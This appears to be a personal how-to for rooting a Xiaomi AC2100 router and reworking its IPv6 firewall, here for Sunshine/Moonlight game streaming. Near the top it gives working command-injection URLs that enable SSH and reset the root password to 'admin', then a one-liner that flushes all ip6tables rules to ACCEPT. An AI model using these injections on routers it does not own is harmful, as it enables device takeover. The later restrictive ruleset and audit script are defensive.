Disabling the IPv6 firewall on the Xiaomi Router AC2100
References
https://github.com/AXFOX/openwrt-AC2100
Steps
- http://192.168.31.1/cgi-bin/luci/;stok=???/web/home#router
http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27admin%5Cnadmin%27%20%7C%20passwd%20root%0A
- The above resets the root password to admin through script injection.
ssh root@192.168.31.1
ip6tables -F;ip6tables -X;ip6tables -P INPUT ACCEPT;ip6tables -P OUTPUT ACCEPT;ip6tables -P FORWARD ACCEPT
Common problems
Unable to negotiate with 192.168.31.1 port 22: no matching host key type found. Their offer: ssh-rsa
Fix:
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.31.1
For security, below are my rules that allow only Sunshine + Moonlight streaming
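# ======================
# 1. Configuration
# ======================
# Ports required by Sunshine + Moonlight
# TCP: 47984, 47989:47990, 47998:48000, 48010, 53333
# UDP: 47984, 47998:48000, 48010
# The port list given above is consolidated here into individual ports.
PORTS_TCP="47984 47989 47990 47998 47999 48000 48010 53333"
PORTS_UDP="47984 47998 47999 48000 48010"
# Interface name of the router's WAN port
WAN_INTERFACE="pppoe-wan"
# Interface name of the internal LAN
LAN_INTERFACE="br-lan"
# ======================
# 2. Clear old rules (useful while testing)
# ======================
ip6tables -F
ip6tables -X
ip6tables -Z
# ======================
# 3. Base firewall policy
# ======================
# Default policy: allow outgoing, block incoming and forwarded traffic
# (no rule below admits new LAN-to-WAN connections, so with FORWARD set to DROP
# only the listed inbound ports and reply traffic are forwarded)
ip6tables -P INPUT DROP
ip6tables -P FORWARD DROP
ip6tables -P OUTPUT ACCEPT
# Allow established and related connections
ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
ip6tables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
# Allow the local loopback interface
ip6tables -A INPUT -i lo -j ACCEPT
# Allow ICMPv6 (required for IPv6 to work properly)
ip6tables -A INPUT -p icmpv6 -j ACCEPT
# ======================
# 4. Hardening
# ======================
# These DROP rules are appended before the port ACCEPT rules of section 5;
# appended after them, they would never see traffic to the allowed ports.
# Drop invalid packets
ip6tables -A INPUT -m conntrack --ctstate INVALID -j DROP
ip6tables -A FORWARD -m conntrack --ctstate INVALID -j DROP
# Guard against common SYN attacks
ip6tables -A FORWARD -p tcp --tcp-flags SYN,ACK SYN,ACK -m conntrack --ctstate NEW -j DROP
# ======================
# 5. Sunshine + Moonlight port allow rules
# ======================
# Loop over the TCP port list and forward traffic from the public side to the LAN
for port in $PORTS_TCP; do
    # Forward traffic from the WAN interface to the LAN interface for each Sunshine TCP port
    ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p tcp --dport "$port" -j ACCEPT
done
# Loop over the UDP port list and forward traffic from the public side to the LAN
for port in $PORTS_UDP; do
    # Forward traffic from the WAN interface to the LAN interface for each Sunshine UDP port
    ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p udp --dport "$port" -j ACCEPT
done
# Allow UPnP / NAT-PMP automatic port-mapping traffic (if Sunshine is configured for UPnP)
# (these two rules accept WAN-to-LAN packets, so UDP 1900 and 5351 on LAN hosts
# become reachable from the WAN side)
ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p udp --dport 1900 -j ACCEPT
ip6tables -A FORWARD -i "$WAN_INTERFACE" -o "$LAN_INTERFACE" -p udp --dport 5351 -j ACCEPT
echo "IPv6 Sunshine firewall rules have been applied successfully."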
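To check the result, the following added example (not part of the original post) parses `ip6tables -S` output and reports INPUT/FORWARD policies other than DROP and any FORWARD rule that accepts WAN-side traffic on a port outside the Sunshine lists above. The function name `audit_rules` and the sample rule listing are constructed for illustration; it assumes single `--dport` matches (ranges included), not `multiport`.

```shell
#!/bin/sh
# Added example: audit `ip6tables -S` text against the page's Sunshine/Moonlight port lists.
ALLOWED_TCP="47984 47989 47990 47998 47999 48000 48010 53333"
ALLOWED_UDP="47984 47998 47999 48000 48010"

# Constructed sample of `ip6tables -S` output (not captured from a real router).
SAMPLE='-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i pppoe-wan -o br-lan -p tcp -m tcp --dport 47984 -j ACCEPT
-A FORWARD -i pppoe-wan -o br-lan -p udp -m udp --dport 47998:48000 -j ACCEPT
-A FORWARD -i pppoe-wan -o br-lan -p udp -m udp --dport 1900 -j ACCEPT'

# audit_rules WAN_IF: reads `ip6tables -S` text on stdin, prints one finding per line.
audit_rules() {
    awk -v wan="$1" -v tcp="$ALLOWED_TCP" -v udp="$ALLOWED_UDP" '
    BEGIN {
        n = split(tcp, a, " "); for (i = 1; i <= n; i++) ok["tcp/" a[i]] = 1
        n = split(udp, a, " "); for (i = 1; i <= n; i++) ok["udp/" a[i]] = 1
    }
    # INPUT and FORWARD must default to DROP.
    $1 == "-P" && ($2 == "INPUT" || $2 == "FORWARD") && $3 != "DROP" {
        print "policy " $2 " is " $3
    }
    $1 == "-A" && $2 == "FORWARD" {
        inif = proto = port = target = state = ""
        for (i = 3; i < NF; i++) {
            if ($i == "-i") inif = $(i + 1)
            if ($i == "-p") proto = $(i + 1)
            if ($i == "--dport") port = $(i + 1)
            if ($i == "-j") target = $(i + 1)
            if ($i == "--ctstate" || $i == "--state") state = $(i + 1)
        }
        if (target != "ACCEPT") next                        # only ACCEPT opens a path
        if (state ~ /ESTABLISHED/ && state !~ /NEW/) next   # reply traffic only
        if (inif != "" && inif != wan) next                 # does not match WAN ingress
        if (port == "") { print "accept without port: " $0; next }
        n = split(port, r, ":"); lo = r[1] + 0; hi = (n > 1 ? r[2] : r[1]) + 0
        for (p = lo; p <= hi; p++)
            if (!((proto "/" p) in ok)) { print "unexpected " proto "/" port; break }
    }'
}

printf '%s\n' "$SAMPLE" | audit_rules pppoe-wan   # the sample has one port outside the lists
```

On the router, run `ip6tables -S | audit_rules pppoe-wan`; no output means only the listed ports are forwarded from the WAN side.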
Check the IPv6 address
curl -6 https://ident.me
curl -6 https://api6.ipify.org
